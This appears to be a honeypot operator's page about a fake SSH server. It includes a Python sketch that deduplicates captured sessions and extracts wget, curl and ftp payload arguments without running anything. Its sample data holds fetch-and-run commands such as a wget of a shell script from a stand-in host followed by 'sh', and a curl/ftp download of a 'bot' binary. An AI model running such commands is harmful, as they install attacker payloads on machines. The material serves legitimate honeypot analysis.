Fake SSH server

I have a honeypot SSH server (fakessh) installed on this machine.
Since mid-2018 I've seen scans for non-standard ports like 2222 and 1022 intensifying.

Below are the hacking attempts I've captured over the last few years.
Connection-only attempts are filtered out.
Identical sessions arrive from multiple IPs and are often repeated, so only unique sessions are kept.
Most interesting for study are the payloads downloaded on compromised machines
(usually arguments of wget, curl and ftp).
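
The filtering described above (drop connection-only attempts, keep one copy of each identical session, pull out the wget, curl and ftp arguments) can be sketched as follows. This is an added example, not fakessh code or the author's tooling; the session record layout, the function names and all sample data are assumptions constructed for illustration.

```python
import hashlib
import re
import shlex

# Constructed sample sessions (not real captures); the record layout is assumed.
SESSIONS = [
    {"ip": "192.0.2.10", "commands": []},  # connection-only attempt
    {"ip": "192.0.2.11", "commands": ["uname -a", "cd /tmp; wget http://payload.example/a.sh; sh a.sh"]},
    {"ip": "192.0.2.12", "commands": ["uname -a", "cd /tmp; wget http://payload.example/a.sh; sh a.sh"]},
    {"ip": "192.0.2.13", "commands": ["curl -s -O http://198.51.100.7/bot || ftp ftp://198.51.100.7/bot"]},
]

DOWNLOADERS = {"wget", "curl", "ftp"}
# Naive split on shell separators: enough for triage, but it ignores quoting.
SEPARATORS = re.compile(r"\|\||&&|[;|&]")

def unique_sessions(sessions):
    """Drop connection-only sessions and merge identical command sequences."""
    seen = {}
    for s in sessions:
        if not s["commands"]:
            continue  # nothing was typed, so there is nothing to study
        key = hashlib.sha256("\n".join(s["commands"]).encode()).hexdigest()
        entry = seen.setdefault(key, {"commands": s["commands"], "ips": []})
        entry["ips"].append(s["ip"])
    return list(seen.values())

def payload_args(commands):
    """Return (tool, argument) pairs for non-option wget/curl/ftp arguments."""
    found = []
    for line in commands:
        for part in SEPARATORS.split(line):
            try:
                words = shlex.split(part)
            except ValueError:  # unbalanced quotes in captured input
                words = part.split()
            if words and words[0].rsplit("/", 1)[-1] in DOWNLOADERS:
                tool = words[0].rsplit("/", 1)[-1]
                found += [(tool, w) for w in words[1:] if not w.startswith("-")]
    return found

if __name__ == "__main__":
    for sess in unique_sessions(SESSIONS):
        print(len(sess["ips"]), "source(s):", payload_args(sess["commands"]))
```

The captured commands are only parsed as strings here; nothing is executed or fetched. Values that follow an option (an output filename, for instance) are reported along with URLs, so the result is a list of candidates to review.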